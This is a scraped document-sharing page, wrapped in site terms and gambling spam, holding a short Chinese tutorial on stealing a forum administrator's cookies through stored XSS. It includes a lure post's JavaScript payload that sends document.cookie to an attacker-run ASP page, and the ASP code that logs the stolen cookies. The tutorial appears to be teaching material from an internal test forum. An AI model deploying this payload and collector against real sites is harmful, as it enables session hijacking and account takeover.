- 1、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
Cookie窃取
利用xss漏洞进行Cookie窃取 背景知识 Xss就是跨站脚本攻击XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击的特殊目的。 Xss攻击过程 下面是跨站脚本攻击的示意图,它详细的展示了攻击的五个步骤。首先,用户点击了黑客发来的电子邮件中的一个嵌入的链接(第1步)。由于跨站点脚本攻击缺陷的原因,这样会导致用户的浏览器向Web 站点发送一个请求(第2步);服务器端根据该请求会生成一个包含恶意脚本的响应,并将其发回给用户的浏览器(第3步)。当用户的机器执行返回的恶意代码时(第4步),就会将用户的敏感数据发送给黑客的计算机(第5步)。 窃取方法 在Cookie攻击的方法中Cookie窃取是最常用的方式,攻击者在窃取管理员的Cookie后,冒用管理员的身份进行登录,以获取管理员的权限。在本文中我通过一个具有xss漏洞的网站来窃取管理员的Cookie。首先我在网站上发表具有攻击脚本的帖子,当管理员浏览我的帖子时,攻击脚本就开始执行,将管理员的Cookie记录到我指定的文件中(省去了xss攻击过程的第1步)。 窃取过程及代码 首先在论坛(测试部内部搭建的bbsxp论坛)上发表一个帖子,例如帖子标题为“管理员不能看的帖子”,人都有好奇心,你越告诉他不能看,他越看(结果只有一个,上当了),输入代码htmlbodyjavascript:window.open(‘1/Cookies.asp?msg=’ +document.Cookie) /body/html; 再次自建一个网站,建立一个asp文档代码如下: testfile=Server.MapPath(cookmm.txt) msg=Request.QueryString set fs=server.CreateObject(scripting.filesystemobject) set thisfile=fs.OpenTextFile(testfile,8,True,0) thisfile.WriteLine(msg ) thisfile.closeset fs = nothing 接着就是在网站目录下创建一cookmm.txt文件; 当管理员浏览了我的帖子时,在cookmm.txt文件就记录了管理员的Cookie; 获取到的Cookie信息
有哪些信誉好的足球投注网站
文档评论(0)